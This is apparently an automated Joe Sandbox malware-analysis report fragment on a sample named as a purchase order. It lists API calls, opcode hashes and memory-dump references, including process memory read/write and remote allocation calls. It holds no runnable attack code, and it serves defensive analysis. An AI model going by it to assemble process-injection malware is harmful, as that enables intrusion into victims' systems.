                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Object$Select$BeginCreateDeletePath
                                                    • String ID:
                                                    • API String ID: 2338827641-0
                                                    • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                    • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                    • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                    • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00434598
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                    • Sleep.KERNEL32(00000000), ref: 004345D4
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                    • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                    • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                    • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                    • MessageBeep.USER32(00000000), ref: 00460C46
                                                    • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                    • EndDialog.USER32(?,00000001), ref: 00460C83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                    • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                    • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                    • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$Icon
                                                    • String ID:
                                                    • API String ID: 4023252218-0
                                                    • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                    • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                    • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                    • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                    APIs
                                                    • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                    • String ID:
                                                    • API String ID: 1489400265-0
                                                    • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                    • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                    • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                    • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                    APIs
                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                    • DestroyWindow.USER32(?), ref: 00455728
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                    • String ID:
                                                    • API String ID: 1042038666-0
                                                    • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                    • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                    • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                    • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                    APIs
                                                    • __getptd.LIBCMT ref: 0041780F
                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                    • __getptd.LIBCMT ref: 00417826
                                                    • __amsg_exit.LIBCMT ref: 00417834
                                                    • __lock.LIBCMT ref: 00417844
                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                    • String ID:
                                                    • API String ID: 938513278-0
                                                    • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                    • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                    • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                    • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                    APIs
                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                    • __freefls@4.LIBCMT ref: 00415209
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                    • String ID:
                                                    • API String ID: 4247068974-0
                                                    • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                    • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                    • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                    • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )$U$\
                                                    • API String ID: 0-3705770531
                                                    • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                    • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                    • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                    • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                    APIs
                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                    • CoInitialize.OLE32(00000000), ref: 0046E505
                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                    • CoUninitialize.OLE32 ref: 0046E53D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 886957087-24824748
                                                    • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                    • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                    • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                    • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                    • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                    • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                    • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                    • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                    • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                    • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                    • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                    • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                    • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 708495834-557222456
                                                    • Opcode ID: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                                    • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                    • Opcode Fuzzy Hash: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                                    • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                    APIs
                                                      • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                      • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                      • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                      • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                      • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                    • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                    • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                    • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
